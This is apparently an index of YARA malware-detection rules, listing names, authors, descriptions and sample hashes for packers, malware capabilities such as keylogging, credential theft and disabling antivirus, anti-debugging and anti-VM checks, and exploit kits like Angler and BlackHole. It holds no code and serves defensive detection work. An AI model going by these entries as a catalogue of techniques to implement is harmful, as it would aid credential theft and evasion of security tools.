packers_index NullsoftInstallSystemv20 author: malware-lu
packers_index SLVc0deProtectorv11SLV author: malware-lu
packers_index PEArmor04600759hying author: malware-lu
packers_index RpolycryptbyVaska2003071841 author: malware-lu
packers_index DevCv4 author: malware-lu
packers_index DevCv5 author: malware-lu
packers_index UnderGroundCrypterbyBooster2000 author: malware-lu
packers_index PrivateEXEProtector18 author: malware-lu
packers_index PolyCryptPE214b215JLabSoftwareCreationshsigned author: malware-lu
packers_index MEW10byNorthfox author: malware-lu
packers_index MaskPEV20yzkzero author: malware-lu
packers_index ChinaProtectdummy author: malware-lu
packers_index MinkeV101Codius author: malware-lu
packers_index ElicenseSystemV4000ViaTechInc author: malware-lu
packers_index PEStubOEPv1x author: malware-lu
packers_index EXECryptor2117StrongbitSoftCompleteDevelopment author: malware-lu
packers_index GHFProtectorpackonlyGPcH author: malware-lu
packers_index UPXV194MarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index SoftComp1xBGSoftPT author: malware-lu
packers_index PeCompact2253276BitSumTechnologies author: malware-lu
packers_index FlyCrypter10ut1lz author: malware-lu
packers_index RSCsProcessPatcherv14 author: malware-lu
packers_index hmimysPacker10hmimys author: malware-lu
packers_index RLPackV112V114LZMA430ap0x author: malware-lu
packers_index EXECryptorV22Xsoftcompletecom author: malware-lu
packers_index PeStubOEPv1x author: malware-lu
packers_index DEFv10 author: malware-lu
packers_index UnnamedScrambler251Beta2252p0ke author: malware-lu
packers_index PrivateEXEProtector18SetiSoft author: malware-lu
packers_index Safe20 author: malware-lu
packers_index MZ_Crypt10byBrainSt0rm author: malware-lu
packers_index NTKrnlPackerAshkbizDanehkar author: malware-lu
packers_index NME11Publicbyredlime author: malware-lu
packers_index FakeNinjav28AntiDebugSpirit author: malware-lu
packers_index EnigmaProtector10XSukhovVladimir author: malware-lu
packers_index PEProtect09byCristophGabler1998 author: malware-lu
packers_index RCryptorv16dVaska author: malware-lu
packers_index Enigmaprotector112VladimirSukhov author: malware-lu
packers_index PolyEnEV001LennartHedlund author: malware-lu
packers_index TrainerCreationKitv5Trainer author: malware-lu
packers_index EXEStealthv273 author: malware-lu
packers_index EXEStealthv274 author: malware-lu
packers_index ProtectSharewareV11eCompservCMS author: malware-lu
packers_index Upackv035alphaDwing author: malware-lu
packers_index InnoSetupModulev304betav306v307 author: malware-lu
packers_index ASDPackv10asd author: malware-lu
packers_index ORiENV1XV2XFisunAV author: malware-lu
packers_index ARMProtector03bySMoKE author: malware-lu
packers_index DzAPatcherv13Loader author: malware-lu
packers_index NullsoftPiMPInstallSystemv1x author: malware-lu
packers_index EXECryptor2223protectedIAT author: malware-lu
packers_index Morphinev33SilentSoftwareSilentShieldc2005 author: malware-lu
packers_index VMProtect07x08PolyTech author: malware-lu
packers_index WerusCrypter10Kas author: malware-lu
packers_index PEQuakev006byfORGAT author: malware-lu
packers_index Anti007V26LiuXingPing author: malware-lu
packers_index aPackv098m author: malware-lu
packers_index BamBamv001Bedrock author: malware-lu
packers_index EXEStealthv25 author: malware-lu
packers_index Shrinker33 author: malware-lu
packers_index Shrinker32 author: malware-lu
packers_index Shrinker34 author: malware-lu
packers_index eXPressorv120b author: malware-lu
packers_index SCObfuscatorSuperCRacker author: malware-lu
packers_index eXPressorv14CGSoftLabs author: malware-lu
packers_index PUNiSHERV15FEUERRADER author: malware-lu
packers_index nMacrorecorder10 author: malware-lu
packers_index iPBProtectv013 author: malware-lu
packers_index PrivateEXEProtector197SetiSoft author: malware-lu
packers_index FSGv20 author: malware-lu
packers_index SimplePack1XMethod2bagie author: malware-lu
packers_index FishPEShield112116HellFish author: malware-lu
packers_index PrivateexeProtector20SetiSoftTeam author: malware-lu
packers_index PEBundlev310 author: malware-lu
packers_index PECompactv2xx author: malware-lu
packers_index Armadillo440SiliconRealmsToolworks author: malware-lu
packers_index EXEStealth276UnregisteredWebtoolMaster author: malware-lu
packers_index ABCCryptor10byZloY author: malware-lu
packers_index RLPackV112V114aPlib043ap0x author: malware-lu
packers_index Crypter31SLESH author: malware-lu
packers_index FreeCryptor02build002GlOFF author: malware-lu
packers_index PackItBitchV10archphase author: malware-lu
packers_index NullsoftInstallSystemv20b4 author: malware-lu
packers_index BeRoEXEPackerV100BeRo author: malware-lu
packers_index VIRUSIWormHybris author: malware-lu
packers_index GPInstallv50332 author: malware-lu
packers_index VIRUSIWormBagle author: malware-lu
packers_index UnnamedScrambler20p0ke author: malware-lu
packers_index NsPackv31NorthStar author: malware-lu
packers_index HyingsPEArmor075exeHyingCCG author: malware-lu
packers_index SimplePack121build0909Method2bagie author: malware-lu
packers_index UnnamedScrambler12C12Dp0ke author: malware-lu
packers_index AlexProtectorv04beta1byAlex author: malware-lu
packers_index FishPEShield101HellFish author: malware-lu
packers_index PrivateexeProtector21522XSetiSoftTeam author: malware-lu
packers_index PiCryptor10byScofield author: malware-lu
packers_index PEArmor07600765hying author: malware-lu
packers_index VBOXv43v46 author: malware-lu
packers_index ARMProtectorv01bySMoKE author: malware-lu
packers_index NullsoftInstallSystemv20a0 author: malware-lu
packers_index D1S1Gv11betaD1N author: malware-lu
packers_index INCrypter03INinYbyz3e_NiFe author: malware-lu
packers_index MorphineV27Holy_FatherRatter29A author: malware-lu
packers_index nBinderv361 author: malware-lu
packers_index MatrixDongleTDiGmbH author: malware-lu
packers_index NullsoftInstallSystemv20RC2 author: malware-lu
packers_index MSLRHv01emadicius author: malware-lu
packers_index VProtector11A12vcasm author: malware-lu
packers_index codeCrypter031 author: malware-lu
packers_index RLPackFullEditionV11Xap0x author: malware-lu
packers_index Escargot01byueMeat author: malware-lu
packers_index ACProtectv135riscosoftwareIncAnticrackSoftware author: malware-lu
packers_index winrar_sfx author: Kevin Falcoz date_create: 18/03/2013 description: Winrar SFX Archive
packers_index mpress_2_xx_net author: Kevin Falcoz date_create: 24/03/2013 description: MPRESS v2.XX .NET
packers_index rpx_1_xx author: Kevin Falcoz date_create: 24/03/2013 description: RPX v1.XX
packers_index dotfuscator author: Jean-Philippe Teissier / @Jipe_ description: Dotfuscator date: 2013-02-01 filetype: memory version: 1.0
packers_index AutoIt_2 author: Jean-Philippe Teissier / @Jipe_ description: AutoIT packer date: 2013-02-01 filetype: memory version: 1.0
packers_index IsPE64
packers_index IsWindowsGUI
packers_index HasTaggantSignature author: _pusher_ description: TaggantSignature Check date: 2016-07
packers_index HasRichSignature author: _pusher_ description: Rich Signature Check date: 2016-07
packers_index free_pascal author: _pusher_ description: Free Pascal date: 2015-08 version: 0.1
packers_index borland_delphi_dll author: _pusher_ description: Borland Delphi DLL date: 2015-08 version: 0.1 info: one is at entrypoint
packers_index AutoIt author: _pusher_ date: 2016-07 description: www.autoitscript.com/site/autoit/
packers_index Microsoft_Visual_Cpp_V80_Debug
packers_index Microsoft_Visual_Cpp_80_Debug_
packers_index Microsoft_Visual_Cpp_80_Debug
capabilities_index inject_thread author: x0r description: Code injection with CreateRemoteThread in a remote process version: 0.1
capabilities_index create_service author: x0r description: Create a windows service version: 0.2
capabilities_index create_com_service author: x0r description: Create a COM server version: 0.1
capabilities_index network_udp_sock author: x0r description: Communications over UDP network version: 0.1
capabilities_index network_tcp_listen author: x0r description: Listen for incoming communication version: 0.1
capabilities_index network_dyndns author: x0r description: Communications dyndns network version: 0.1
capabilities_index network_smtp_dotNet author: x0r description: Communications smtp version: 0.1
capabilities_index network_smtp_raw author: x0r description: Communications smtp version: 0.1
capabilities_index network_smtp_vb author: x0r description: Communications smtp version: 0.1
capabilities_index network_p2p_win author: x0r description: Communications over P2P network version: 0.1
capabilities_index network_irc author: x0r description: Communications over IRC network version: 0.1
capabilities_index network_http author: x0r description: Communications over HTTP version: 0.1
capabilities_index network_dropper author: x0r description: File downloader/dropper version: 0.1
capabilities_index network_ftp author: x0r description: Communications over FTP version: 0.1
capabilities_index network_tcp_socket author: x0r description: Communications over RAW socket version: 0.1
capabilities_index network_dns author: x0r description: Communications use DNS version: 0.1
capabilities_index network_ssl author: x0r description: Communications over SSL version: 0.1
capabilities_index network_dga author: x0r description: Communication using dga version: 0.1
capabilities_index bitcoin author: x0r description: Perform crypto currency mining version: 0.1
capabilities_index escalate_priv author: x0r description: Escalade priviledges version: 0.1
capabilities_index screenshot author: x0r description: Take screenshot version: 0.1
capabilities_index lookupip author: x0r description: Lookup external IP version: 0.1
capabilities_index lookupgeo author: x0r description: Lookup Geolocation version: 0.1
capabilities_index keylogger author: x0r description: Run a keylogger version: 0.1
capabilities_index cred_local author: x0r description: Steal credential version: 0.1
capabilities_index sniff_audio author: x0r description: Record Audio version: 0.1
capabilities_index cred_ff author: x0r description: Steal Firefox credential version: 0.1
capabilities_index cred_vnc author: x0r description: Steal VNC credential version: 0.1
capabilities_index cred_ie7 author: x0r description: Steal IE 7 credential version: 0.1
capabilities_index sniff_lan author: x0r description: Sniff Lan network traffic version: 0.1
capabilities_index migrate_apc author: x0r description: APC queue tasks migration version: 0.1
capabilities_index spreading_file author: x0r description: Malware can spread east-west file version: 0.1
capabilities_index spreading_share author: x0r description: Malware can spread east-west using share drive version: 0.1
capabilities_index rat_vnc author: x0r description: Remote Administration toolkit VNC version: 0.1
capabilities_index rat_rdp author: x0r description: Remote Administration toolkit enable RDP version: 0.1
capabilities_index rat_webcam author: x0r description: Remote Administration toolkit using webcam version: 0.1
capabilities_index win_mutex author: x0r description: Create or check mutex version: 0.1
capabilities_index win_registry author: x0r description: Affect system registries version: 0.1
capabilities_index win_token author: x0r description: Affect system token version: 0.1
capabilities_index win_private_profile author: x0r description: Affect private profile version: 0.1
capabilities_index win_files_operation author: x0r description: Affect private profile version: 0.1
capabilities_index Str_Win32_Winsock2_Library author: @adricnet description: Match Winsock 2 API library declaration method: String match reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Wininet_Library author: @adricnet description: Match Windows Inet API library declaration method: String match reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Internet_API author: @adricnet description: Match Windows Inet API call method: String match, trim the As reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Http_API author: @adricnet description: Match Windows Http API call method: String match, trim the As reference: https://github.com/dfirnotes/rules
capabilities_index ldpreload author: xorseed reference: https://stuff.rop.io/
antidebug_antivm_index DebuggerCheck__PEB weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__GlobalFlags weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__QueryInfo weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__RemoteAPI weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerHiding__Thread Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara weight: 1
antidebug_antivm_index DebuggerHiding__Active weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerException__ConsoleCtrl weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerException__SetConsoleCtrl weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index ThreadControl__Context weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__DrWatson weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__v3 weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__v4 weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__vba weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__vectored weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH_Save author: Malware Utkonos original_author: naxonez source: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH_Init author: Malware Utkonos original_author: naxonez source: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index Check_Wine Author: Nick Hoffman Description: Checks for the existence of Wine Sample: de1af0e97e94859d372be7fcf3a5daa5
antidebug_antivm_index vmdetect author: nex description: Possibly employs anti-virtualization techniques
antidebug_antivm_index Check_FilePaths Author: Nick Hoffman Description: Checks for filepaths containing popular sandbox names Sample: de1af0e97e94859d372be7fcf3a5daa5
antidebug_antivm_index Check_OutputDebugStringA_iat Author: http://twitter.com/j0sm1 Description: Detect in IAT OutputDebugstringA Date: 20/04/2015
antidebug_antivm_index WMI_VM_Detect version: 2 threat: Using WMI to detect virtual machines via querying video card information behaviour_class: Evasion author: Joe Giron date: 2015-09-25 description: Detection of Virtual Appliances through the use of WMI for use of evasion.
antidebug_antivm_index anti_dbg author: x0r description: Checks if being debugged version: 0.2
antidebug_antivm_index anti_dbgtools author: x0r description: Checks for the presence of known debug tools version: 0.1
antidebug_antivm_index antisb_threatExpert author: x0r description: Anti-Sandbox checks for ThreatExpert version: 0.1
antidebug_antivm_index antisb_sandboxie author: x0r description: Anti-Sandbox checks for Sandboxie version: 0.1
antidebug_antivm_index antivm_virtualbox author: x0r description: AntiVM checks for VirtualBox version: 0.1
antidebug_antivm_index antivm_vmware author: x0r description: AntiVM checks for VMWare version: 0.1
antidebug_antivm_index disable_antivirus author: x0r description: Disable AntiVirus version: 0.2
antidebug_antivm_index disable_firewall author: x0r description: Disable Firewall version: 0.1
antidebug_antivm_index disable_dep author: x0r description: Bypass DEP version: 0.1
antidebug_antivm_index win_hook author: x0r description: Affect hook table version: 0.1
antidebug_antivm_index vmdetect_misc author: @abhinavbom maltype: NA version: 0.1 date: 31/10/2015 description: Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.
exploit_kits_index angler_flash author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 8081397c30b53119716c374dd58fc653 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash2 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 23812c5a1d33c9ce61b0882f860d79d6 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash4 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: dbb3f5e90c05602d92e5d6e12f8c1421 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash5 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 9f809272e59ee9ecd71093035b31eec6 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash_uncompressed author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 2543855d992b2f9a576f974c2630d851 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_html author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: afca949ab09c5583a2ea5b2006236666 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_html2 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 6c926bf25d1a8a80ab988c8a34c0102e sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_js author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 482d6c24a824103f0bcd37fa59e19452 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 86946ec2d2031f2b456e804cac4ade6d sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar2 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: add1d01ba06d08818ff6880de2ee74e8 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar3 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: c7abd2142f121bd64e55f145d4b860fa sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_pdf author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: d1e2ff36a6c882b289d3b736d915a6cc sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole1_jar author: Josh Berry date: 2016-06-26 description: BlackHole1 Exploit Kit Detection hash0: 724acccdcf01cf2323aa095e6ce59cae sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 92e21e491a90e24083449fd906515684 hash1: 98b302a504a7ad0e3515ab6b96d623f9 hash2: a91d885ef4c4a0d16c88b956db9c6f43 hash3: d8336f7ae9b3a4db69317aea105f49be hash4: eba5daf0442dff5b249274c99552177b hash5: 02d8e6daef5a4723621c25cfb766a23d hash6: dadf69ce2124283a59107708ffa9c900 hash7: 467199178ac940ca311896c7d116954f hash8: 17ab5b85f2e1f2b5da436555ea94f859 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm10 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 83704d531c9826727016fec285675eb1 hash1: 103ef0314607d28b3c54cd07e954cb25 hash2: 16c002dc45976caae259d7cabc95b2c3 hash3: fd84d695ac3f2ebfb98d3255b3a4e1de hash4: c7b417a4d650c72efebc2c45eefbac2a hash5: c3c35e465e316a71abccca296ff6cd22 hash7: 10ce7956266bfd98fe310d7568bfc9d0 hash8: 60024caf40f4239d7e796916fb52dc8c sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm11 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: e89b56df597688c489f06a0a6dd9efed hash1: 06ba331ac5ae3cd1986c82cb1098029e hash2: a899dedb50ad81d9dbba660747828c7b hash3: 7cbb58412554327fe8b643204a046e2b hash7: 530d31a0c45b79c1ee0c5c678e242c02 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm12 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 0d3acb5285cfe071e30be051d2aaf28a hash1: 6f27377115ba5fd59f007d2cb3f50b35 hash2: f7ffe1fd1a57d337a04d3c777cddc065 hash3: 06997228f2769859ef5e4cd8a454d650 hash4: 11062eea9b7f2a2675c1e60047e8735c hash7: 4ec720cfafabd1c9b1034bb82d368a30 hash8: ecd7d11dc9bb6ee842e2a2dce56edc6f sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm3 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 018ef031bc68484587eafeefa66c7082 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm4 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 926429bf5fe1fbd531eb100fc6e53524 hash1: 7b6cdc67077fc3ca75a54dea0833afe3 hash2: 82f108d4e6f997f8fc4cc02aad02629a hash3: bd819c3714dffb5d4988d2f19d571918 hash4: 9bc9f925f60bd8a7b632ae3a6147cb9e hash7: 386cb76d46b281778c8c54ac001d72dc hash8: 0d95c666ea5d5c28fca5381bd54304b3 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm5 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: fccb8f71663620a5a8b53dcfb396cfb5 hash1: a09bcf1a1bdabe4e6e7e52e7f8898012 hash2: 40db66bf212dd953a169752ba9349c6a hash3: 25a87e6da4baa57a9d6a2cdcb2d43249 hash4: 6f4c64a1293c03c9f881a4ef4e1491b3 hash7: 4bdfff8de0bb5ea2d623333a4a82c7f9 hash8: b43b6a1897c2956c2a0c9407b74c4232 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm6 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: a5f94d7bdeb88b57be67132473e48286 hash1: 2e72a317d07aa1603f8d138787a2c582 hash2: 9440d49e1ed0794c90547758ef6023f7 hash3: 58265fc893ed5a001e3a7c925441298c hash7: 95c6462d0f21181c5003e2a74c8d3529 hash8: 9236e7f96207253b4684f3497bcd2b3d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm8 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 3f47452c1e40f68160beff4bb2a3e5f4 hash1: 1e2ba0176787088e3580dfce0245bc16 hash2: 1c78d96bb8d8f8a71294bc1e6d374b0f hash3: f5e16a6cd2c2ac71289aaf1c087224ee hash7: 6702efdee17e0cd6c29349978961d9fa hash8: 287dca9469c8f7f0cb6e5bdd9e2055cd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_adobe_2010_1297_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: 8179a7f91965731daa16722bd95f0fcf sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_adobe_2010_2884_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: b22ac6bea520181947e7855cd317c9ac sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_jar2 author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: 2bc0619f9a0c483f3fd6bce88148a7ab sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_java_2010_0842_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: b14ee91a3da82f5acc78abd10078752e sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index crimepack_jar author: Josh Berry date: 2016-06-26 description: CrimePack Exploit Kit Detection hash0: d48e70d538225bc1807842ac13a8e188 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index crimepack_jar3 author: Josh Berry date: 2016-06-26 description: CrimePack Exploit Kit Detection hash0: 40ed977adc009e1593afcb09d70888c4 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: ad829f4315edf9c2611509f3720635d2 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar2 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 94e99de80c357d01e64abf7dc5bd0ebd sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar3 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: f65f3b9b809ebf221e73502480ab6ea7 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 08f8488f1122f2388a0fd65976b9becd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js2 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 2f5ace22e886972a8dccc6aa5deb1e79 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js3 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 9dcb8cd8d4f418324f83d914ab4d4650 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_htm author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f76deec07a61b4276acc22beef41ea47 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f234c11b5da9a782cb1e554f520a66cf sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js2 author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f234c11b5da9a782cb1e554f520a66cf sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_flash author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 377431417b34de8592afecaea9aab95d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_java author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 7398e435e68a2fa31607518befef30fb sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_quicktime author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 6bfc7bb877e1a79be24bd9563c768ffd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_vml author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 8ab72337c815e0505fcfbc97686c3562 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 8395f08f1371eb7b2a2e131b92037f9a sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html10 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: f5f8dceca74a50076070f2593e82ec43 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html11 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: be8c81288f9650e205ed13f3167ce256 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 2fd263f5d988a92715f4146a0006cb31 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: d7cacbff6438d866998fc8bfee18102d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html4 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 61fde003211ac83c2884fbecefe1fc80 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html5 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 30afdca94d301905819e00a7458f4a4e sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html6 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 4aabb710cf04240d26c13dd2b0ccd6cc sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html7 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: f0e1b391ec3ce515fd617648bec11681 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html8 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 1c19a863fc4f8b13c0c7eb5e231bc3d1 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html9 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 742d012b9df0c27ed6ccf3b234db20db sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: a8a18219b02d30f44799415ff19c518e sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 989c5b5eaddf48010e62343d7a4db6f4 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: c5655c496949f8071e41ea9ac011cab2 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
